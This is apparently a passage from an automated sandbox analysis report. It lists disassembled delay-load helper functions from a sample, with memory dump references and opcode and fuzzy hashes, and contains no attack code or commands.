                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 656d32e31d661991196e8d4d84d05a9b5632e023d6274fc84933d372306c0f43
                                                                                                                                  • Instruction ID: 5617af526a4ff7fd6e96e97673f157a0ac50769e266f85b46f52b24ba670a4fa
                                                                                                                                  • Opcode Fuzzy Hash: 656d32e31d661991196e8d4d84d05a9b5632e023d6274fc84933d372306c0f43
                                                                                                                                  • Instruction Fuzzy Hash: C6B092A1258105AC2154520A2902CB6029DE084B11330C13AF815C0780985069490432
                                                                                                                                  Function 008BE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 341de65405b8077795eb94009c3b9b5dd846d643f985f0f3fc35288097fbe3e0
                                                                                                                                  • Instruction ID: ce48ce0603f73c9076c130049a5d7f200bd60d211b7fda5a36dda756beb215c1
                                                                                                                                  • Opcode Fuzzy Hash: 341de65405b8077795eb94009c3b9b5dd846d643f985f0f3fc35288097fbe3e0
                                                                                                                                  • Instruction Fuzzy Hash: 1BB092A1258245AC219452092802CB6029DE084B11330C23AF815C0780984068440432
                                                                                                                                  Function 008BE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 47a1f56f4ad384c70764d583d728cedbe994ceabe740614588131be8e93da731
                                                                                                                                  • Instruction ID: 701bb49cb20bffc8dec0096866d94c6a5021e75b2fdce54a779afd9f638791bd
                                                                                                                                  • Opcode Fuzzy Hash: 47a1f56f4ad384c70764d583d728cedbe994ceabe740614588131be8e93da731
                                                                                                                                  • Instruction Fuzzy Hash: 3AB092A1259105AC215451092802CB6029DE486B11330C13AF815C03809840A9000472
                                                                                                                                  Function 008BE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 8d15acd295f5bde375e37a036a3a989ca2bff33ead3fe0ccae33396877b0a020
                                                                                                                                  • Instruction ID: 2ec68979554057ddbc6ae3effda712edf6b820ce54672a825a555ec9a461dad4
                                                                                                                                  • Opcode Fuzzy Hash: 8d15acd295f5bde375e37a036a3a989ca2bff33ead3fe0ccae33396877b0a020
                                                                                                                                  • Instruction Fuzzy Hash: 38B092A1258205AC219451092802CB6029DE485B11330C23AF815C0380984069400432
                                                                                                                                  Function 008BE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: f8daf852bd36a97ca903bb218fc132d34483de0eef664f31a5b1f0ae10ea90c2
                                                                                                                                  • Instruction ID: ef7cabb4980686ccbd04c31172d62ff3cfdb22be5bba6f40b3446d447586ec83
                                                                                                                                  • Opcode Fuzzy Hash: f8daf852bd36a97ca903bb218fc132d34483de0eef664f31a5b1f0ae10ea90c2
                                                                                                                                  • Instruction Fuzzy Hash: BDB092A1258105AC3154510A2802CB6029DF489B11330C13AF815C0380984069000432
                                                                                                                                  Function 008BE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 656da5ad1cfd57cd48de5d24c8d9422a7e3653524047f4e114794e3a27aa3726
                                                                                                                                  • Instruction ID: 579e8e4e4b6af01509c6f231a7dc983ae7613954f2e1cbe812053a3cff489334
                                                                                                                                  • Opcode Fuzzy Hash: 656da5ad1cfd57cd48de5d24c8d9422a7e3653524047f4e114794e3a27aa3726
                                                                                                                                  • Instruction Fuzzy Hash: 22B092A1258105AC2154510A2902DB6029DE485B11330C13AF815C0380D8406A010432
                                                                                                                                  Function 008BE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 310fd2d8249504eb2174512330f20ec099d990c560bf1c1719122293b2321535
                                                                                                                                  • Instruction ID: 3316748721466ed9fecb13a256db89fb3efa7286260563dcafc9209ab88f4474
                                                                                                                                  • Opcode Fuzzy Hash: 310fd2d8249504eb2174512330f20ec099d990c560bf1c1719122293b2321535
                                                                                                                                  • Instruction Fuzzy Hash: CEB012E125D145AC3154510D2C03CF7029EF1C5B11330C13FFC15C03C0D840BC001472
                                                                                                                                  Function 008BE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 266addbf2c029d0dc226bc790af4667453a68dc9d70b1413733a0763fc123bba
                                                                                                                                  • Instruction ID: 254f4e1f3bedb5785338521db46e567ba2fcb7a5f7b004232c9e5a741761dfea
                                                                                                                                  • Opcode Fuzzy Hash: 266addbf2c029d0dc226bc790af4667453a68dc9d70b1413733a0763fc123bba
                                                                                                                                  • Instruction Fuzzy Hash: E2B092A1259245AC219452092802CB6029EE184B11330C23AF815C0380984068441432
                                                                                                                                  Function 008BE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 2d28268fb58cb4fdc979d646a639713e0dfd4886ce122f66137ae66cfb14f130
                                                                                                                                  • Instruction ID: 32b014ce865ffac5a709a23eebff057d408cd7d548835506e9bf8dababfcfaaa
                                                                                                                                  • Opcode Fuzzy Hash: 2d28268fb58cb4fdc979d646a639713e0dfd4886ce122f66137ae66cfb14f130
                                                                                                                                  • Instruction Fuzzy Hash: 49B092A1258105AC2154511A2802CBA029DE085B15330C13AF815C03809840A8000472
                                                                                                                                  Function 008BE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: cde53ff0a8646906ceebfcbcb2ca77471eba5a5d303ec366a8114d8c8a68891e
                                                                                                                                  • Instruction ID: a555f708a09ff0748f69efa2eab5b95211fe4c9f161fc7217fe2288825d3d73f
                                                                                                                                  • Opcode Fuzzy Hash: cde53ff0a8646906ceebfcbcb2ca77471eba5a5d303ec366a8114d8c8a68891e
                                                                                                                                  • Instruction Fuzzy Hash: 95B012E126D145AC3154510D2C03CF702DEF5C8B11330C13FF816C03C0D8407C001432
                                                                                                                                  Function 008BE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 3e4c70ee38a7b98fbf1035313d6fa6eaadeaeb46407dd5b396e3ba2b1baaa2b3
                                                                                                                                  • Instruction ID: c9134f5d8fa1d14c917796530f37cc414c5426cb653f6188097c23de29863d95
                                                                                                                                  • Opcode Fuzzy Hash: 3e4c70ee38a7b98fbf1035313d6fa6eaadeaeb46407dd5b396e3ba2b1baaa2b3
                                                                                                                                  • Instruction Fuzzy Hash: 7CB012E12591057C714452092D02CF703DDE1C4B10330C13FF514C17C0D8415C491473
                                                                                                                                  Function 008BE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 2f67c87c728ffd7e3bc08bc739a5390817ca54a67831c7cf2c8b0466d79614dc
                                                                                                                                  • Instruction ID: 087f5cd3445b8da13455129feeb038929bd7b96523af4b9dae46741ad02bcf26
                                                                                                                                  • Opcode Fuzzy Hash: 2f67c87c728ffd7e3bc08bc739a5390817ca54a67831c7cf2c8b0466d79614dc
                                                                                                                                  • Instruction Fuzzy Hash: 04B012F125A105BC714492082C02CF703DDE5C4F10330C13FF814C13C0D8449E001473
                                                                                                                                  Function 008BE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: d41e8ec0b2fa75592edff376c05a36bfdd328769e8dc1c30d1e0775ed2735813
                                                                                                                                  • Instruction ID: 472955ae4d39064776a7c080138218c570b75a3f0c6e351329e37fc65f465e0d
                                                                                                                                  • Opcode Fuzzy Hash: d41e8ec0b2fa75592edff376c05a36bfdd328769e8dc1c30d1e0775ed2735813
                                                                                                                                  • Instruction Fuzzy Hash: D1B012E1259205BC714492082C02CF703DDE1C4B10330C13FF814C17C0D8409C041473
                                                                                                                                  Function 008BE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
